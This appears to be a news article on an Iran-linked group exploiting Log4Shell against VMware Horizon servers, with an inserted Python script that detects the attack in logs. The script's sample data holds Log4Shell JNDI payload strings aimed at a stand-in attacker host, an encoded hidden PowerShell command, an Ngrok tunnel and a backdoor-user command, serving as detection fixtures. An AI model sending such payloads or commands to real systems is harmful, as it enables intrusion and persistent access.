A “potentially destructive actor” aligned with the government of Iran is actively exploiting the well-known Log4j vulnerability (Log4Shell, CVE-2021-44228) to infect unpatched VMware Horizon servers with ransomware.
Cybersecurity firm SentinelOne dubbed the group “TunnelVision” owing to its heavy reliance on tunneling tools, and observed overlaps in tactics with those of a broader group tracked under the moniker Phosphorus, as well as with Charming Kitten and Nemesis Kitten.
“TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions,” SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky said in a report, with the intrusions detected in the Middle East and the U.S.
Alongside Log4Shell, the group has also been observed exploiting a Fortinet FortiOS path traversal flaw (CVE-2018-13379) and the Microsoft Exchange ProxyShell vulnerabilities to gain initial access to target networks for post-exploitation activity.
The researchers stated:
“TunnelVision attackers had been exploiting this vulnerability to execute malicious PowerShell commands and deploy backdoors. They also created backdoor users, harvested credentials, and performed lateral movement.”
Those PowerShell commands are used to launch tools such as Ngrok and to run further commands through reverse shells. The reverse shells in turn drop a PowerShell backdoor capable of harvesting credentials and executing reconnaissance commands.
SentinelOne said it also found similarities between the procedure used to establish the reverse web shell and another PowerShell-based implant called PowerLess, which Cybereason researchers disclosed this month.
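The two stages described above lend themselves to a concrete detection check. The script below is an added example, not code from the SentinelOne report or from TunnelVision's tooling. It first de-obfuscates Log4j lookup strings in constructed Horizon-style access log lines (nested `${lower:…}`, `${::-…}` and URL-encoded variants that defeat a plain `${jndi:` grep) and flags the JNDI lookups Log4Shell relies on; it then triages constructed process-creation events for the post-exploitation behaviour the researchers list: PowerShell spawned by the web server process, encoded PowerShell, Ngrok, and `net user … /add`. All log lines, IP addresses, file paths (including the Tomcat service path used as the parent process) and the base64 blob are constructed for the example and are assumptions, not indicators from the page.

```python
import re
import urllib.parse

# Added example, not SentinelOne's tooling. All sample data below is constructed.

# --- 1. Log4Shell (CVE-2021-44228) lookup strings in access logs ---

# Constructed Tomcat-style access log lines, as a VMware Horizon Connection
# Server might record them. 198.51.100.7 / 203.0.113.10 are documentation addresses.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [25/Feb/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Feb/2022:10:01:09 +0000] "GET /broker/xml HTTP/1.1" 200 64 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    # Nested lookups: a plain "${jndi:" grep misses this one.
    '198.51.100.7 - - [25/Feb/2022:10:01:15 +0000] "GET /broker/xml HTTP/1.1" 200 64 "-" '
    '"${${lower:j}${lower:n}${::-d}${env:NaN:-i}:${lower:ldap}://203.0.113.10:1389/b}"',
    # URL-encoded variant.
    '198.51.100.7 - - [25/Feb/2022:10:01:20 +0000] "GET /broker/xml HTTP/1.1" 200 64 "-" '
    '"%24%7Bjndi%3Armi%3A%2F%2F203.0.113.10%3A1099%2Fc%7D"',
    '10.0.0.9 - - [25/Feb/2022:10:02:00 +0000] "GET /portal/webclient/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")  # innermost ${...}, no nested lookup inside
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:", re.IGNORECASE)


def _resolve_lookup(body):
    """Evaluate the Log4j lookup forms attackers use purely for obfuscation.
    Returns None for anything else so that text (e.g. ${jndi:...}) is left intact."""
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:  # ${env:NaN:-x}, ${::-x}, ${sys:nope:-x} all evaluate to "x"
        return body.split(":-", 1)[1]
    return None


def normalize_lookups(text, max_rounds=10):
    """URL-decode, then collapse obfuscating lookups from the inside out until stable."""
    text = urllib.parse.unquote(text)
    for _ in range(max_rounds):
        def sub(m):
            resolved = _resolve_lookup(m.group(1))
            return m.group(0) if resolved is None else resolved
        new_text = INNER_LOOKUP.sub(sub, text)
        if new_text == text:
            break
        text = new_text
    return text


def find_log4shell_attempts(lines):
    """Return (source_ip, jndi_protocol, normalized_line) for each JNDI lookup seen."""
    hits = []
    for line in lines:
        norm = normalize_lookups(line)
        m = JNDI_LOOKUP.search(norm)
        if m:
            hits.append((line.split(" ", 1)[0], m.group(1).lower(), norm))
    return hits


# --- 2. Post-exploitation: PowerShell, tunneling tools, backdoor users ---

# Constructed process-creation events (Sysmon EID 1 / Security 4688 style).
# The Tomcat service path is an assumption, not an indicator from the report.
SAMPLE_PROCESS_EVENTS = [
    {"parent": r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Users\Public\ngrok.exe", "cmdline": "ngrok.exe tcp 3389"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\net.exe", "cmdline": "net user svc_backup P@ssw0rd! /add"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe report.txt"},
]

COMMAND_LINE_RULES = [
    # -e / -ec / -en / -enc / -encodedcommand followed by a base64 blob
    ("encoded_powershell", re.compile(r"(?i)\s-e(?:c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}")),
    ("tunnel_tool", re.compile(r"(?i)\bngrok(?:\.exe)?\b")),
    ("backdoor_user", re.compile(r"(?i)\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b")),
]


def triage_process_events(events):
    """Return (image_name, [reasons]) for events matching the described chain."""
    findings = []
    for ev in events:
        parent, image = ev["parent"].lower(), ev["image"].lower()
        reasons = []
        # A Java/Tomcat web server spawning PowerShell is the Log4Shell-to-shell step.
        if image.endswith("powershell.exe") and ("tomcat" in parent or parent.endswith("java.exe")):
            reasons.append("powershell_from_java_server")
        for name, rule in COMMAND_LINE_RULES:
            if rule.search(ev["cmdline"]):
                reasons.append(name)
        if reasons:
            findings.append((image.rsplit("\\", 1)[-1], reasons))
    return findings


if __name__ == "__main__":
    for src, proto, _ in find_log4shell_attempts(SAMPLE_ACCESS_LOG):
        print("log4shell", src, proto)
    for image, reasons in triage_process_events(SAMPLE_PROCESS_EVENTS):
        print("process", image, ",".join(reasons))
```

The normalizer only resolves the lookup forms that exist purely to hide the string (`lower`, `upper`, and the `:-` default syntax) and leaves `${jndi:…}` alone, so the detector sees the de-obfuscated payload; it URL-decodes once, so double-encoded input would need a second pass. Matching on the parent/child relationship rather than on a hash is what makes the process rule survive a renamed tunnel binary or a new backdoor script.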
Throughout the activity, the threat actor is said to have used a GitHub repository named “VmWareHorizon” under the username “protections20” to host the malicious payloads.
The cybersecurity firm said it tracks the attacks as a distinct Iranian cluster not because it believes they are unrelated to those groups, but because there is “insufficient data to treat these as identical to any other attributions.”